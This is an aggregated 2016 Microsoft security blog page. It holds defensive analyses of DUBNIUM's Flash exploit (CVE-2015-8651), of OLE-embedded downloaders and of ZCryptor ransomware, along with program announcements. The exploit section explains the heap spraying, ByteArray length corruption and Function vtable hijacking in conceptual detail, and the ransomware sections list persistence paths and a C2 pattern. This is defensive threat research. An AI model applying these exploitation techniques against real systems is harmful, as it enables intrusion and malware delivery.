Trustworthy Computing Security and Privacy Blogs./blogs/default.aspxThis page consolidates and features blogs from Microsoft’s Trustworthy Computing (TwC) group, The team charged with working to deliver more secure, private and reliable computing experiences to customers and the globe. Drop by to read about Microsoft’s long-term vision and strategy, for computing privacy and security.Reverse-engineering DUBNIUM’s Flash-targeting exploit, 20 Jun 2016 20:30:20 +0000 DUBNIUM campaign in December involved one exploit in-the-wild that affected Adobe Flash Player. In this blog, we’re going to examine the technical details of the exploit that targeted vulnerability CVE-2015-8651. For more details on this vulnerability, see Adobe Security Bulletin APSB16-01.

Note that Microsoft Edge on Windows 10 was protected from this attack due to the mitigations introduced into the browser.


Vulnerability exploitation

Adobe Flash Player version checks

The nature of the vulnerability is an integer overflow, and the exploit code has quite extensive subroutines in it. It tries to cover versions of the player from 11.x to the most recent version at the time of the campaign,

The earliest version of Adobe Flash Player 11.x was released in October 2011 ( and the last version of Adobe Flash Player 10.x was released in June 2013 ( This doesn’t necessarily mean the exploit existed from 2011 or 2013, but it again demonstrates the broad target the exploit tries to cover.

Figure 1 Version check for oldest Flash Player the exploit targets

Figure 1 Version check for oldest Flash Player the exploit targets


Mainly we focused our analysis upon the function named qeiofdsa, as the routine covers any Adobe Flash player version since (released on September 21, 2015).

Figure 2 Version check for latest Flash Player the exploit supports

Figure 2 Version check for latest Flash Player the exploit supports


Why is this version of Flash Player so important? Because that is the release which had the latest Vector length corruption hardening applied at the time of the incident. The original Vector length hardening came with and it is well explained in the Security @ Adobe blog

The Vector object from Adobe Flash Player can be used as a corruption target to acquire read or write (RW) primitives.

This object has a very simple object structure and predictable allocation patterns without any sanity checks on the objects. This made this object a very popular target for exploitation for recent years. There were a few more bypasses found after that hardening, and had another bypass hardening. The exploit uses a new exploitation method (ByteArray length corruption) since this new version of Adobe Flash Player.

Note, however, that with new mitigation from Adobe released after this incident, the ByteArray length corruption method no longer works.

To better understand the impact of the mitigations on attacker patterns, we compared exploit code line counts for the pdfsajoe routine, which exploits Adobe Flash Player versions earlier than, to the qeiofdsa routine, which exploits versions after We learned that pdfsajoe has 139 lines of code versus qeiofdsa with 5,021.

While there is really no absolute way to measure the impact and line code alone is not a standard measurement, we know that in order to target the newer versions of Adobe Flash Player, the attacker would have to write 36 more times the lines of code.

Subroutine name pdfsajoe qeiofdsa
Vulnerable Flash Player version Below and up
Mitigations No latest Vector mitigations Latest Vector mitigations applied
Lines of attack code 139 lines 5,021 lines
Ratio 1 36

Table 1 Before and after Vector mitigation


This tells us a lot about the importance of mitigation and the increasing cost of exploit code development. Mitigation in itself doesn’t fix existing vulnerabilities, but it is definitely raising the bar for exploits.


Heap spraying and vulnerability triggering

The exploit heavily relies on heap spraying. Among heap spraying of various objects, the code from Figure 3 shows the code where the ByteArray objects are sprayed. This ByteArray has length of 0x10. These sprayed objects are corruption targets.

Figure 3 Heap-spraying code

Figure 3 Heap-spraying code


The vulnerability lies in the implementation of fast memory opcodes. More detailed information on the usage of fast memory opcodes are available in the Faster byte array operations with ASC2 article at the Adobe Developer Center.

After setting up application domain memory, the code can use avm2.intrinsics.memory. The package provides various methods including li32 and si32 instructions. The li32 can be used to load 32bit integer values from fast memory and si32 can be used to store 32bit integer values to fast memory. These functions are used as methods, but in the AVM2 bytecode level, they are opcode themselves.

Figure 4 Setting up application domain memory

Figure 4 Setting up application domain memory


Due to the way these instructions are implemented, the out-of-bounds access vulnerability happens (Figure 5). The key to this vulnerability is the second li32 statement just after first li32 one in each IF statement. For example, from the li32((_local_4+0x7FEDFFD8)) statement, the _local_4+0x7FEDFFD8 value ends up as 4 after integer overflow. From the just-in-time (JIT) level, the range check is only generated for this li32 statement, skipping the range check JIT code for the first li32 statement.

Figure 5 Out-of-bounds access code using li32 instructions

Figure 5 Out-of-bounds access code using li32 instructions


We compared the bytecode level AVM2 instructions with the low-level x86 JIT instructions. Figure 6 shows the comparisons and our findings. Basically two li32 accesses are made and the JIT compiler optimizes length check for both li32 instructions and generates only one length check. The problem is that integer overflow happens and the length check code becomes faulty and allows bypasses of ByteArray length restrictions. This directly ends with out-of-bounds RW access of the process memory. Historically, fast memory implementation suffered range check vulnerabilities (CVE-2013-5330, CVE-2014-0497). The Virus Bulletin 2014 paper by Chun Feng and Elia Florio, Ubiquitous Flash, ubiquitous exploits, ubiquitous mitigation (PDF download), provides more details on other old but similar vulnerabilities.

Figure 6 Length check confusion

Figure 6 Length check confusion


Using this out-of-bounds vulnerability, the exploit tries to locate heap-sprayed objects.

These are the last part of memory sweeping code. We counted 95 IF/ELSE statements that sweep through memory range from ba+0x121028 to ba+0x17F028 (where ba is the base address of fast memory), which is 0x5E000 (385,024) byte size. Therefore, these memory ranges are very critical for this exploit’s successful run.

Figure 7 End of memory sweeping code

Figure 7 End of memory sweeping code


Figure 8 shows a crash point where the heap spraying fails. The exploit heavily relies on a specific heap layout for successful exploitation, and the need for heap spraying is one element that makes this exploit unreliable.

Figure 8 Out-of-bounds memory access

Figure 8 Out-of-bounds memory access


This exploit uses a corrupt ByteArray.length field and uses it as RW primitives (Figure 9).

Figure 9 Instruction si32 is used to corrupt ByteArray.length field

Figure 9 Instruction si32 is used to corrupt ByteArray.length field


After ByteArray.length corruption, it needs to determine which ByteArray is corrupt out of the sprayed ByteArrays (Figure 10).


Figure 10 Determining corrupt ByteArray

Figure 10 Determining corrupt ByteArray

RW primitives

The following shows various RW primitives that this exploit code provides. Basically these extensive lists of methods provide functions to support different application and operating system flavors.

Figure 11 RW primitives

Figure 11 RW primitives


For example, the read32x86 method can be used to read an arbitrary process’s memory address on x86 platform. The cbIndex variable is the index into the bc array which is an array of the ByteArray type. The bc[cbIndex] is the specific ByteArray that is corrupted through the fast memory vulnerability. After setting virtual address as position member, it uses the readUnsignedInt method to read the memory value.

Figure 12 Read primitive

Figure 12 Read primitive


The same principle applies to the write32x86 method. It uses the writeUnsignedInt method to write to arbitrary memory location.

Figure 13 Write primitive

Figure 13 Write primitive


Above these, the exploit can perform a slightly complex operation like reading multiple bytes using the readBytes method.

Figure 14 Byte reading primitive

Figure 14 Byte reading primitive


Function object virtual function table corruption

Just after acquiring the process’s memory RW ability, the exploit tries to get access to code execution. This exploit uses a very specific method of corrupting a Function object and using the apply and call methods of the object to achieve shellcode execution. This method is similar to the exploit method that was disclosed during the Hacking Team leak. Figure 15 shows how the Function object’s virtual function table pointer (vptr) is acquired through a leaked object address, and low-level object offset calculations are performed. The offsets used here are relevant to the Adobe Flash Player’s internal data structure and how they are linked together in the memory.

Figure 15 Resolving Function object vptr address

Figure 15 Resolving Function object vptr address


This leaked virtual function table pointer is later overwritten with a fake virtual function table’s address. The fake virtual function table itself is cloned from the original one and the only pointer to apply method is replaced with the VirtualProtect API. Later, when the apply method is called upon the dummy function object, it will actually call the VirtualProtect API with supplied arguments – not the original empty call body. The supplied arguments are pointing to the memory area that is used for temporary shellcode storage. The area is made read/write/executable (RWX) through this method.

Figure 16 Call VirtualProtect through apply method

Figure 16 Call VirtualProtect through apply method


Once the RWX memory area is reserved, the exploit uses the call method of the Function object to perform further code execution. It doesn’t use the apply method because it no longer needs to pass any arguments. Calling the call method is also simpler (Figure 17).

Figure 17 Shellcode execution through call method

Figure 17 Shellcode execution through call method


This shellcode-running routine is highly modularized and you can actually use API names and arguments to be passed to the shellcode-running utility function. This makes shellcode building and running very extensible. Again, this method has close similarity with the code found with the Adobe Flash exploit leaked during the Hacking Team information leak in July 2015.

Figure 18 Part of shellcode call routines

Figure 18 Part of shellcode call routines


Note that the exploit’s method of using the corrupted Function object virtual table doesn’t work on Microsoft Edge anymore as it has additional mitigation against these kinds of attacks.

ROP-less shellcode

With this exploit, shellcode is not just contiguous memory area, but various shellcodes are called through separate call methods. As you can see from this exploit, we are observing more exploits operate without return-oriented programming (ROP) chains. We can track these calls by putting a breakpoint on the native code that performs the ActionScript call method. For example, the disassembly in Figure 19 shows the code that calls the InternetOpenUrlA API call.


Figure 19 InternetOpenUrlA 1st download

Figure 19 InternetOpenUrlA 1st download


This call only retrieves some portion of a portable executable (PE) file’s header, but not the whole file. It will do another run of the InternetOpenUrlA API call to retrieve the remaining body of the payload. This is most likely a trick to confuse analysts who will look for a single download session for payloads.

Figure 20 InternetOpenUrlA 2nd download

Figure 20 InternetOpenUrlA 2nd download


With the analysis of the Adobe Flash Player-targeting exploit used by DUBNIUM last December, we learned they are using highly organized exploit code with extensive support of operating system flavors. However, some functionalities for some operating system are not yet implemented. For example, some 64-bit support routines had an empty function inside them.

The way the shellcode is authored makes the exploit code very extensible and flexible as changing shellcode behavior is extremely simple – as much as just changing AS3 code lines.

The actual first stage payload download is not just performed by a single download but are split into two.

They also use the ByteArray.length corruption technique to achieve process memory RW access. There was a hardening upon this object just after this incident and ByteArray now has better sanity checks. Therefore, the same technique would not work as straightforwardly as in this exploit for the versions after the hardening.

The exploit relies heavily on heap-spraying techniques, and this is one major element that makes this exploit unreliable.

This is a good example of how mitigation undermines an exploit’s stability, and how it increases exploit development cost.

Due to the exploitation method it relies on for the Function object corruption, with Microsoft Edge you have additional protection over this new exploit method.


Jeong Wook Oh

Where’s the Macro? Malware authors are now using OLE embedding to deliver malicious files, 14 Jun 2016 22:24:00 +0000, we’ve seen reports of malicious files that misuse the legitimate Office object linking and embedding (OLE) capability to trick users into enabling and downloading malicious content. Previously, we’ve seen macros used in a similar matter, and this use of OLE might indicate a shift in behavior as administrators and enterprises are mitigating against this infection vector with better security and new options in Office.

In these new cases, we’re seeing OLE-embedded objects and content surrounded by well-formatted text and images to encourage users to enable the object or content, and thus run the malicious code. So far, we’ve seen these files use malicious Visual Basic (VB) and JavaScript (JS) scripts embedded in a document.

The script or object is surrounded by text that encourages the user to click or interact with the script (which is usually represented with a script-like icon). When the user interacts with the object, a warning prompts the user whether to proceed or not. If the user chooses to proceed (by clicking Open), the malicious script runs and any form of infection can occur.

Packager warning

Figure 1: Warning message prompts the users to check whether they should open the script or not.

It’s important to note that user interaction and consent is still required to execute the malicious payload. If the user doesn’t enable the object or click on the object – then the code will not run and an infection will not occur.

Education is therefore an important part of mitigation – as with spam emails, suspicious websites, and unverified apps. Don’t click the link, enable the content, or run the program unless you absolutely trust it and can verify its source.

In late May 2016, we came across the following Word document (Figure 2) that used VB script and language similar to that used in CAPTCHA and other human-verification tools.


Screenshot of an invitation to unlock contents

Figure 2: Invitation to unlock contents


It’s relatively easy for the malware author to replace the contents of the file (the OLE or embedded object that the user is invited to double-click or activate). We can see this in Figure 3, which indicates the control or script is a JS script.

A screenshot of a possible JavaScript variant

Figure 3: Possible JavaScript variant


The icon used to indicate the object or content can be just about anything. It can be a completely different icon that has nothing to do with the scripting language being used – as the authors can use any pictures and any type

Screenshot of an embedded object variant

Figure 4: Embedded object variant


It’s helpful to be aware of what this kind of threat looks like, what it can look like, and to educate users to not enable, double-click, or activate embedded content in any file without first verifying its source.

Technical details – downloading and decrypting a binary

On the sample we investigated, the contents of the social engineering document is a malicious VB script, which we detect as TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs. This sample also distinguishes itself from the typical download-and-execute routine common to this type of infection vector – it has a “decryption function”.

This malicious VB script will download an encrypted binary, bypassing any network-based protection designed to recognize malicious formats and block them, decrypt the binary, and then run it. Figure 5 illustrates the encrypted binary we saw in this sample.

Screenshot of the encrypted binary

Figure 5: The encrypted binary


The embedded object or script downloads the encrypted file to %appdata% with a random file name, and proceeds to decrypt it using the script’s decryption function (Figure 6).

Screenshot of the decryption process, part 1

Screenshot of the decryption process, part 2

Screenshot of the decryption process, part 3

Figure 6: Decryption process

Lastly, it executes the now-decrypted binary, which in this example was Ransom:Win32/Cerber.

Screenshot of the decrypted Win32 executable

Figure 7: Decrypted Win32 executable


Our data shows these threats (TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs) are not particularly prevalent, with the greatest concentration in the United States.

We’ve also seen a steady decline since we first discovered it in late May 2016.

Worldwide prevalence of TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs

Figure 8: Worldwide prevalence

Daily prevalence of TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs

Figure 9: Daily prevalence


Prevention and recovery recommendations

Administrators can prevent activation of OLE packages by modifying the registry key HKCU\Software\Microsoft\Office\<Office Version>\<Office application>\Security\PackagerPrompt.

The Office version values should be:

  • 16.0 (Office 2016)
  • 15.0 (Office 2013)
  • 14.0 (Office 2010)
  • 12.0 (Office 2007)


Setting the value to 2 will cause the  to disable packages, and they won’t be activated if a user tries to interact with or double-click them.

The value options for the key are:

  • 0 – No prompt from Office when user clicks, object executes
  • 1 – Prompt from Office when user clicks, object executes
  • 2 – No prompt, Object does not execute

You can find details about this registry key the Microsoft Support article,


See our other blogs and our ransomware help page for further guidance on preventing and recovering from these types of attacks:



Alden Pornasdoro



June 2016 security update release, 14 Jun 2016 17:00:30 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.

MSRC team

Reverse-engineering DUBNIUM, 10 Jun 2016 01:43:56 +0000 (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features.

We located multiple variants of multiple-stage droppers and payloads in the last few months, and although they are not really packed or obfuscated in a conventional way, they use their own methods and tactics of obfuscation and distraction.

In this blog, we will focus on analysis of the first-stage payload of the malware.

As the code is very complicated and twisted in many ways, it is a complex task to reverse-engineer the malware. The complexity of the malware includes linking with unrelated code statically (so that their logic can hide in a big, benign code dump) and excessive use of an in-house encoding scheme. Their bootstrap logic is also hidden in plain sight, such that it might be easy to miss.

Every sub-routine from the malicious code has a “memory cleaner routine” when the logic ends. The memory snapshot of the process will not disclose many more details than the static binary itself.

The malware is also very sneaky and sensitive to dynamic analysis. When it detects the existence of analysis toolsets, the executable file bails out from further execution. Even binary instrumentation tools like PIN or DynamoRio prevent the malware from running. This effectively defeats many automation systems that rely on at least one of the toolsets they check to avoid. Avoiding these toolsets during analysis makes the overall investigation even more complex.

With this blog series, we want to discuss some of the simple techniques and tactics we’ve used to break down the features of DUBNIUM.

We acquired multiple versions of DUBNIUM droppers through our daily operations. They are evolving slowly, but basically their features have not changed over the last few months.

In this blog, we’ll be using sample SHA1: dc3ab3f6af87405d889b6af2557c835d7b7ed588 in our examples and analysis.

Hiding in plain sight

The malware used in a DUBNIUM attack is committed to disguising itself as Secure Shell (SSH) tool. In this instance, it is attempting to look like a certificate generation tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance.

Figure 1: SSH tool disguise

Figure 1: SSH tool disguise


When it is run, the program actually dumps out dummy certificate files into the file system and, again, this can be very convincing to an analyst who is initially researching the file.

Figure 2 Create dummy certificate files

Figure 2 Create dummy certificate files


The binary is indeed statically linked with OpenSSL library, such that it really does look like an SSH tool. The problem with reverse engineering this sample starts from the fact that it has more than 2,000 functions and most of them are statically linked to OpenSSL code without symbols.

Figure 3: DUBNIUM functions list

Figure 3: DUBNIUM functions list


The following is an example of one of these functions – note it even has string references to the source code file name.

Figure 4: Code snippet that is linked from OpenSSL library

Figure 4: Code snippet that is linked from OpenSSL library


It can be extremely time-consuming just going through the dump of functions that have no meaning at all in the code – and this is only one of the more simplistic tactics this malware is using.

We can solve this problem using binary similarity calculation. This technique has been around for years for various purposes, and it can be used to detect code that steals copyrighted code from other software.

The technique can be used to find patched code snippets in the software and to find code that was vulnerable for attack. In this instance, we can use the same technique to clean up unnecessary code snippets from our advanced persistent threat (APT) analysis and make a reverse engineer’s life easier.

Many different algorithms exist for binary similarity calculation, but we are going to use one of the simplest approach here. The algorithm will collect the op-code strings of each instruction in the function first (Figure 5). It will then concatenate the whole string and will use a hash algorithm to get the hash out of it. We used the SHA1 hash in this case.

Figure 5: Op code in the instructions

Figure 5: Op code in the instructions


Figure 6 shows the Python-style pseudo-code that calculates the hash for a function. Sometimes, the immediate constant operand is a valuable piece of information that can be used to distinguish similar but different functions and it also includes the value in the hash string. It is using our own utility function RetrieveFunctionInstructions which returns a list of op-code and operand values from a designated function.

01 def CalculateFunctionHash(self,func_ea):
02     hash_string=''
03     for (op, operand) in self.RetrieveFunctionInstructions(func_ea):
04            hash_string+=op
05            if len(drefs)==0:
06                  for operand in operands:
07                         if operand.Type==idaapi.o_imm:
08                                hash _string+=('%x' % operand.Value)
10     m=hashlib.sha1()
11     m.update(op_string)
12     return m.hexdigest()

Figure 6: Pseudo-code for CalculateFunctionHash

With these hash values calculated for the DUBNIUM binary, we can compare these values with the hash values from the original OpenSSL library. We identified from the compiler-generated meta-data that the version the sample is linked to is openssl-1.0.1l-i386-win. After gathering same hash from the OpenSSL library, we could import symbols for the matched functions. In this way, removed most of the functions from our analysis scope.

Figure 7: OpenSSL functions

Figure 7: OpenSSL functions

(This blog is continued on the next page)

Microsoft Bounty Program expansion – .NET Core and ASP.NET RC2 Beta Bounty, 07 Jun 2016 17:00:02 +0000 I have another exciting expansion of the Microsoft Bounty Program. Please visit to find out more. As we approach release for .NET Core and ASP.NET, we would like to get even more feedback from the security research community. We are offering a bounty on the .NET Core and ASP.NET Core RC2 Beta Build which was announced on May 16, 2016.

The program highlights are:

  • Bounty applies to .NET Core, ASP.NET Core RC2 and any subsequent release candidates during the bounty period, or the final RTM version if released within the bounty period.
  • Supported platforms are Windows, OS X and Linux.
  • The bounty will run June 7, 2016 to September 7, 2016.
  • Bounty payouts will range from $500 USD to $15,000 USD.
  • You can install the RC2 from

This new bounty will be in addition to our ongoing Nano Server beta, Online Services, and Mitigation bypass and Bounty for Defense bounty programs. These additions are a part of the rigorous security programs at Microsoft. Bounties will be worked alongside the Security Development Lifecycle (SDL), Operational Security Assurance (OSA) framework, regular penetration testing of our products and services, and Security and Compliance Accreditations by third party audits.

As always, the most up-to-date information about the Microsoft Bounty Programs can be found at and in the associated terms and FAQs.

Happy hacking!

Jason Shirk

BlueHat v16 Announced, 01 Jun 2016 19:59:41 +0000 is pleased to announce our sixteenth BlueHat Security Conference set for November 3-4, 2016 at the Microsoft Conference Center here in Redmond. BlueHat is a unique opportunity for Microsoft engineers and the security community to come together learn about the current threat landscape and challenge the thinking and we actions we do in security. This past January saw 1,000 participants from around the world engage in this forum. We are excited to formally begin the push for our next conference!

At this time we are also opening the call for papers. The blend of external and internal speakers that help challenge us around the security issues pressing our customers makes this conference great. The call for papers will run June 1st through August 19th, 2016. We are looking for abstract submissions with clear calls to action for our engineering focused audience. Some possible themes we are interested in seeing abstracts on are:

  • Virtualization & Cloud-based research, exploits, and defense
  • How customers are getting owned (case studies and research)
  • New Exploit techniques
  • Emerging Threats & Trends
  • Anti-exploitation techniques
  • Human Hacking & Defense
  • Identity & Authentication research, exploits, and defense
  • Infrastructure & IoT Security research, exploits, and defense
  • Machine learning & security analytics

The field for abstracts is wide open. Come challenge us and help to shape how Microsoft thinks about security! This year we have a new tool which should make submitting abstracts easier. There are also examples of what has worked well in the past for some of the specific requirements. Submit your abstracts here:   

Watch this blog over the summer as we will release more information and previews for BlueHat v16. We look forward to hearing from you and meeting again in November.


Phillip Misner,

Principal Security Group Manager, MSRC



Learn More About BlueHat v16 Call for Papers: BlueHat v16 CFP Instructions

Link (.lnk) to Ransom, 27 May 2016 05:17:43 +0000 are alerting Windows users of a new type of ransomware that exhibits worm-like behavior. This ransom leverages removable and network drives to propagate itself and affect more users. We detect this ransomware as Ransom:Win32/ZCryptor.A.


Infection vector

Ransom:Win32/ZCryptor.A  is distributed through the spam email infection vector. It also gets installed in your machine through other macro malware*, or fake installers (Flash Player setup).

Once ZCryptor is executed, it will make sure it runs at start-up:


zcrypt = {path of the executed malware}


It also drops autorun.inf in removable drives, a zycrypt.lnk in the start-up folder:

%User Startup%\zcrypt.lnk

..along with a copy of itself as {Drive}:\system.exe and %APPDATA%\zcrypt.exe, and changes the file attributes to hide itself from the user in file explorer.

For example: c:\users\administrator\appdata\roaming\zcrypt.exe


This ransomware will display the following ransom note to users in a dropped HTML file How to decrypt files.html:

Screenshot of Win32/ZCryptor.A  ransom note


It will also target, encrypt files with the following extension, and change the file extension to .zcrypt once it is done (for example,<originalfilename.zcrypt>):

.accdb .dwg .odb .raf
.apk .dxg .odp .raw
.arw .emlx .ods .rtf
.aspx .eps .odt .rw2
.avi .erf .orf .rwl
.bak .gz .p12 .sav
.bay .html .p7b .sql
.bmp .indd .p7c .srf
.cdr .jar .pdb .srw
.cer .java .pdd .swf
.cgi .jpeg .pdf .tar
.class .jpg .pef .tar
.cpp .jsp .pem .txt
.cr2 .kdc .pfx .vcf
.crt .log .php .wb2
.crw .mdb .png .wmv
.dbf .mdf .ppt .wpd
.dcr .mef .pptx .xls
.der .mp4 .psd .xlsx
.dng .mpeg .pst .xml
.doc .msg .ptx .zip
.docx .nrw .r3d .3fr


Infected machines are noticed to have zcrypt1.0 mutex. The mutex denotes that an instance of this ransomware is already running in the infected machine.

We have also seen a connection to the following URL. However, the domain is already down when we were testing:

http://<obfuscated>/rsa/rsa.php?computerid={Computer_ID} where the {Computer_ID} is entry found inside a dropped file %APPDATA%\cid.ztxt

For example, c:\users\administrator\appdata\roaming\cid.ztxt


To help stay protected:

  • Keep your Windows Operating System and antivirus up-to-date.  Upgrade to Windows 10.
  • Regularly back-up your files in an external hard-drive
  • Enable file history or system protection. In your Windows 10 or Windows 8.1 devices, you must have your file history enabled and you have to setup a drive for file history
  • Use OneDrive for Business
  • Beware of phishing emails, spams, and clicking malicious attachment
  • Use Microsoft Edge to get SmartScreen protection. It will prevent you from browsing sites that are known to be hosting exploits, and protect you from socially-engineered attacks such as phishing and malware downloads.
  • Disable the loading of macros in your Office programs
  • Disable your Remote Desktop feature whenever possible
  • Use two factor authentication
  • Use a safe internet connection
  • Avoid browsing web sites that are known for being malware breeding grounds (illegal download sites, porn sites, etc.)



In Office 365’s How to deal with ransomware blog, there are several options on how one can remediate or recover from a ransomware attack. Here are some of the few that are applicable for a home user or those in the information industry like you:

  1. Make sure you have backed-up your files.
  2. Recover the files in your device. If you have previously turned File History on in Windows 10 and Windows 8.1 devices or System Protection in Windows 7 and Windows Vista devices, you can (in some cases) recover your local files and folders.

To restore your files or folders in Windows 10 and Windows 8.1:

  • Swipe in from the right edge of the screen, tap Search (or if you’re using a mouse, point to the upper-right corner of the screen, move the mouse pointer down, and then click Search). Enter “restore your files” in the search box, and then tap or click Restore your files with File History.
  • Enter the name of file you’re looking for in the search box, or use the left and right arrows to browse through different versions of your folders and files.
  • Select what you want to restore to its original location, and then tap or click the Restore button. If you want to restore your files onto a different location than the original, press and hold, or right-click the Restore button, tap or click Restore To, and then choose a new location.

Source: Restore files or folders using File History

To restore your files in Windows 7 and Windows Vista

  • Right-click the file or folder, and then click Restore previous versions. You’ll see a list of available previous versions of the file or folder. The list will include files saved on a backup (if you’re using Windows Backup to back up your files) as well as restore points. Note: To restore a previous version of a file or folder that’s included in a library, right-click the file or folder in the location where it’s saved, rather than in the library. For example, to restore a previous version of a picture that’s included in the Pictures library but is stored in the My Pictures folder, right-click the My Pictures folder, and then click Restore previous versions. For more information about libraries, see Include folders in a library.
  • Before restoring a previous version of a file or folder, select the previous version, and then click Open to view it to make sure it’s the version you want. Note: You can’t open or copy previous versions of files that were created by Windows Backup, but you can restore them.
  • To restore a previous version, select the previous version, and then click Restore.

Warning: The file or folder will replace the current version on your computer, and the replacement cannot be undone. Note: If the Restore button isn’t available, you can’t restore a previous version of the file or folder to its original location. However, you might be able to open it or save it to a different location.

Source: Previous versions of files: frequently asked questions

Important: Some ransomware will also encrypt or delete the backup versions and will not allow you to do the actions described before. If this is the case, you need to rely on backups in external drives (not affected by the ransomware) or OneDrive (Next step).

Warning: If the folder is synced to OneDrive and you are not using the latest version of Windows, there might be some limitations using File History.

  1. Recover your files in your OneDrive for Consumer
  2. Recover your files in your OneDrive for Business

If you use OneDrive for Business, it will allow you to recover any files you have stored in it. You can use either of the following options:

Restore your files using the Portal

Users can restore previous version of the file through the user interface. To do this you can:

1. Go to OneDrive for Business in the portal

2. Right click the file you want to recover, and select Version History.

3. Click the dropdown list of the version you want to recover and select restore


If you want to learn more about this feature, take a look at the Restore a previous version of a document in OneDrive for Business support article.

Create a Site Collection Restore service request

If a large number of files were impacted, using the user interface in the portal will not be a viable option. In this case, create a support request for a ‘Site Collection Restore’. This request can restore up to 14 days in the past. To learn how to do this please take a look at the Restore Option in SharePoint Online blog post.


*Related macro malware information:


Edgardo Diaz and Marianne Mallen

Microsoft Malware Protection Center (MMPC)

Limited Periodic Scanning in Windows 10 to Provide Additional Malware Protection, 26 May 2016 22:30:03 +0000 month, Microsoft’s Malicious Software Removal Tool (MSRT) scans more than 500 million Windows devices for malware and malicious software. This tool aids in the detection and removal of malware from 1 to 2 million machines each time, even on those devices running antivirus software. Meanwhile, many Windows customers continue to use the Microsoft Safety Scanner (MSS) to manually scan their PC for malware.

Windows 10 is the most secure operating system Microsoft has ever shipped, and we continue to make it better with regular security updates and new features. For example, we’re making malware detection and protection even easier and more seamless for our customers, whether they choose to use the built-in Windows Defender antivirus or a third-party antivirus solution. Starting with the Windows 10 Anniversary Update this summer—and available in this week’s Windows Insider build—Windows 10 will include a new security setting called Limited Periodic Scanning. Windows Insiders can enable this feature on unmanaged devices today.

When enabled, Windows 10 will use the Windows Defender scanning engine to periodically scan your PC for threats and remediate them.  These periodic scans will utilize Automatic Maintenance—to ensure the system chooses optimal times based on minimal impact to the user, PC performance, and energy efficiency—or customers can schedule these scans. Limited Periodic Scanning is intended to offer an additional line of defense to your existing antivirus program’s real-time protection.


Enabling Windows 10 Limited Periodic Scanning

If you are not using Windows Defender as your antivirus program on Windows 10, you can enable Limited Periodic Scanning under Settings.

  1. Navigate to Settings -> Update & Security -> Windows Defender.
  2. Turn Limited Periodic Scanning on.

Screenshot of the Limited Periodic Scanning option

If you are already using Windows Defender as your antivirus program on Windows 10, then you already have this feature enabled. Windows Defender periodically scans your PC, also known as Scheduled scans.


Notifying you of threats found on your PC

When Windows 10 Limited Periodic Scanning is turned ON, and even if you are NOT using Windows Defender for your real-time protection, the Windows Defender user interface and History tab will allow you to view any additional threats that have been detected.

Screenshot of Windows Defender periodic scanning settings Screenshot of the Windows Defender History settings

When a threat is found, Windows Defender will notify you with a Windows 10 notification. In most cases, Windows Defender will also automatically take action on the threat. Clicking on the notification will open Windows Defender where you can further review the threat that was found and the action that was automatically taken.

Screenshot of the Windows Defender scan notification

Clicking the notification will take you to the Windows Defender main user interface, where additional actions (if required) can be taken and applied.

At this time, Windows 10 Limited Periodic Scanning is intended for consumers. We are evaluating this feature for commercial customers, but Limited Periodic Scanning only applies to unmanaged devices for the Windows 10 Anniversary Update.

Windows 10 is our most secure operating system yet, and we will continue to improve Windows 10 with features like Limited Periodic Scanning. With Windows 10, you can rest assured you’ll always have the latest security protections. To learn more about the security features offered in Windows 10 visit:



Deepak Manohar

Microsoft Malware Protection Center

New Edge Blog: Ensuring high-quality browser accessibility with automation, 26 May 2016 16:30:42 +0000, the Edge team posted a new blog about ensuring high-quality browser accessibility with automated testing. This addition will help ensure accessibility is not accidentally regressed as we make other improvements to the browser.

Ongoing work has helped improve accessibility in Edge, but we want all Windows users to have a remarkable accessibility experience, no matter what browser they’re using. To help the community in this endeavor, Microsoft is open sourcing our HTML 5 Accessibility test harness code on Github with an MIT license.

We hope this can be useful in helping make our products work for everyone, and we look forward to feedback and contributions from the community!

Read the full blog post about these improvements on the Microsoft Edge Developer Blog.

Global Accessibility Awareness Day 2016: The Power of Awareness, 19 May 2016 16:04:33 +0000 following blog post was written by Jenny Lay-Flurrie, Microsoft Chief Accessibility Officer.

Today is Global Accessibility Awareness Day (GAAD), an international day of action to get people talking, thinking and learning about digital accessibility. For me, it’s a moment to pause and reflect on what I’ve learned since moving into the role of Chief Accessibility Officer earlier this year. It’s been a great and fast learning curve, aided by many of you! I’ve received so many emails from around the globe with ideas, questions and more. As we continue to work on making our products and services more accessible, usable and productive for people with and without disabilities, your feedback is invaluable so please keep it coming!

A lot of the emails were prompted by one particular blog where we shared plans for enhancing the accessibility of our products in 2016. First, I want to assure you we continue to work hard to deliver against those plans. Second, I wanted to share some key themes and programs that I so often highlight in my responses to your emails:

  • Inclusive Hiring: We are thrilled that more and more companies are getting involved and reaching out to get or share ideas on how to better their inclusive hiring practices. We recently created a Microsoft Inclusive Hiring site to provide potential candidates with one place to find information on job opportunities and read stories from employees like Kyle Schwaneke. Inclusive hiring isn’t optional or a “nice to do” – it’s vital to deliver on our strategy. We were thrilled to have 25 likeminded companies participate in our Ability Career Fair this year and will soon announce the 2016/2017 winners of the Disability Scholarships Award. To deliver products that live and breathe accessibility, we must hire great talent with disabilities and advocates that empathize, and look forward to continuing to share more about our journey on disability inclusion.
  • Inclusive Design: The ways in which people interact with our products and services is diverse. This means that to ensure we’re designing products that work for everyone, we must build experiences in a way that is intentionally inclusive of everyone from the beginning. Inclusive Design Sprints enable our designers and engineers to partner with individuals that have a range of disabilities across visual, hearing, speech, mobility and cognitive spectrums. All the resources are online and available for download. If we create a solution that works well for people with disabilities, we’ll help foster better designs for everyone.
